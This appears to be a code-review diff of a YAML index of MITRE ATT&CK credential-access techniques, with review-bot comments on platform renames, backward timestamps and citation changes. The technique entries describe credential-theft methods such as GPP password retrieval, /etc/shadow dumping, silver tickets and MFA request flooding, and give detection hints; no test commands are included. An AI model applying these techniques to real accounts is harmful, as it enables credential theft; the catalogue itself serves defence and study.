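Review bot: the platform list for T1528 changes content, not just spelling: `Office 365`, `Azure AD` and `Google Workspace` are removed and `IaaS`, `Office Suite` and `Identity Provider` are added, with `x_mitre_version` bumped from 1.3 to 1.4. `Office Suite` and `Identity Provider` are the newer ATT&CK names that consolidate the old SaaS platform entries (the `Azure AD` to `Entra ID` wording change later in this patch belongs to the same refresh), but `IaaS` is a genuinely new platform for this technique, and the same rename recurs below for T1606, T1621, T1552.008, T1212, T1110, T1110.004, T1556.006 and T1556.009. Anything that filters this index by platform string (per-platform index files, test selection keyed on `x_mitre_platforms`) will silently match nothing for the old names, so those consumers should be regenerated or updated in the same PR.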
@@ -45983,44 +46742,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46037,25 +46763,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
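Review bot: the `modified` timestamp for T1556.008 (Network Provider DLL) moves backwards, from `2023-10-31T14:00:00.188Z` to `2023-05-04T18:02:51.318Z`, while every other object in this patch moves forward to a 2024 date. A regressing timestamp usually means the entry was regenerated from an older or different upstream snapshot than its neighbours; please confirm this is the intended source and not a stale object, because tooling that compares `modified` to decide whether a technique needs refreshing will now treat this one as older than it was before the patch. The same hunk also drops `x_mitre_permissions_required: - User` and `spec_version` for T1552.006 without replacement, matching the T1552.003 change above.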
@@ -46130,11 +46885,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46178,11 +46932,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -46206,8 +46959,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
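Review bot: the `GitHub AWS-ADFS-Credential-Generator` citation now resolves to a different repository owner (`damianh/aws-adfs-credential-generator` becomes `pvanbuijtene/aws-adfs-credential-generator`), with the retrieved date moved to September 27, 2024. A change of owner in a reference URL is worth a one-line check that it came from the upstream ATT&CK data rather than a local edit, and that the new location is the maintained home of the project rather than a fork; if it is upstream's change, a sentence in the PR description saying that external reference URLs were refreshed would save the next reader the same question.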
@@ -46223,11 +46976,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46238,11 +46990,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -46252,16 +47006,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -46299,13 +47053,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46314,6 +47065,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -46321,11 +47073,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -46343,13 +47095,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -46362,6 +47111,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -46375,12 +47125,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -46412,17 +47163,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -46495,12 +47243,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46509,6 +47256,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -46527,18 +47275,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -46562,13 +47310,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46594,6 +47339,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -46605,18 +47351,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -46635,14 +47381,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -46671,24 +47414,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -46723,13 +47468,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -46807,14 +47549,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -46830,6 +47571,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -46838,13 +47580,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -46852,15 +47594,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -46871,9 +47609,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -46919,7 +47656,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -46938,17 +47675,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
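Review bot: T1557.002 (ARP Cache Poisoning) keeps `x_mitre_attack_spec_version: 2.1.0` in the unchanged context of this hunk, and the hunk immediately above moves its `modified` timestamp backwards from `2022-11-08T14:00:00.188Z` to `2022-07-22T18:37:22.176Z`, while the surrounding objects are refreshed to spec 3.2.0 with 2024 dates. That pattern suggests this object was not regenerated from the same snapshot as the rest; please verify the source before merging so the index does not mix attack-spec versions. The `Azure AD` to `Entra ID` wording change in the T1556.009 description in this hunk, and the replacement of `Azure AD` and `SaaS` by `Identity Provider` in its platform list in the next hunk, look consistent with the rest of the refresh.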
@@ -46981,10 +47717,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -47021,11 +47756,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47093,34 +47827,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47129,20 +47839,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -47174,7 +47906,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47200,13 +47932,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
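Review bot: for T1558.002 (Silver Ticket) this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` and adds nothing, so unless the object carries `x_mitre_attack_spec_version` somewhere not shown here, it becomes the only technique in this patch without one; the hunk above also moves its `modified` backwards from `2021-04-29T14:49:39.188Z` to `2020-03-25T21:46:46.831Z`. Note too that `x_mitre_permissions_required: - User` survives here as unchanged context while the same key is removed from T1552.003, T1552.006, T1056 and T1003.008 elsewhere in the patch; if the generator drops that field it should drop it everywhere, so this object looks like it came from an older snapshot and deserves the same check as T1556.008 and T1557.002.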
@@ -47223,24 +47953,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
